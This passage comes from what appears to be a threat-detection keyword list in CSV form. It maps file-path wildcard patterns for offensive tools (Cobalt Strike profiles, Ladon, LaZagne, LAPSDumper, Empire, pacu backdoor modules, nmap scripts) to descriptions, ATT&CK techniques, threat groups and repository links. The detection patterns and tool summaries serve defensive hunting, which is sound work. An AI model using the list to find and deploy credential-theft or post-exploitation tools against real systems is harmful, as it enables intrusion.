Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/krbjack.git*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z"
+"*/KrbRelay*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z"
+"*/krbrelayx*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
+"*/KRBUACBypass*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z"
+"*/kronos.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z"
+"*/kubesploit.git*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*/L0ading-x/cve-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/L0ading-x/cve-2022-23131","1","1","N/A","N/A","1","23","11","2022-02-22T01:45:34Z","2022-02-22T01:39:52Z"
+"*/laconicwolf/burp-extensions*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - 
T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z"
+"*/Ladon.go*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*/Ladon.ps1*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*/Ladon.py*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*/Ladon/Ladon.*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*/Ladon/obj/x86*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*/LadonGo/*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*/lambda__backdoor_new_roles*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/lambda__backdoor_new_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/lambda__backdoor_new_users*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for 
testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/LambdaLooter.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z"
+"*/lanattacks/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/lansearch.exe*","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://www.advanced-port-scanner.com/","1","1","N/A","7","10","N/A","N/A","N/A","N/A"
+"*/laps.py *--ldapserver*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z"
+"*/laps.py *-u * -p *","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z"
+"*/laps.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/laps_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 
- TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/LAPSDumper.git*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z"
+"*/lastpass.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"*/Lateral/SMB.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z"
+"*/lateral_movement/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*/lateral_movement/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1092","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*/laZagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z"
+"*/LaZagne/Windows/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/ldap.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*/ldap_injection.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,,
+"*/ldap_search_bof.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
+"*/ldap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ldap-checker.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/ldap-novell-getpass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/LdapRelayScan.git*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z"
+"*/ldap-rootdse.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ldap-search.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ldapsearch-ad.git*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z"
+"*/LDAPWordlistHarvester.git*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z"
+"*/ldeep/*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z"
+"*/ldeepDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/LetMeOutSharp/*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z"
+"*/lexmark-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
